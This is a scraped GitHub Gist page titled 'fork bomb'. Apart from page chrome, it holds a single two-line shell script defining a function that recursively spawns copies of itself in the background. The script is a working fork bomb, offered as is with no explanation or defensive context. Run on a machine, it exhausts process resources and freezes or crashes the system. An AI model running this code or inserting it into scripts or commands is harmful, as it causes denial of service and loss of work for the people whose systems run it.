Last active
December 5, 2023 16:50
-
-
Save vvh413/53afcb4886e736317fb6d9fb25ac9342 to your computer and use it in GitHub Desktop.
fork bomb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
x(){ x|x& };x |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment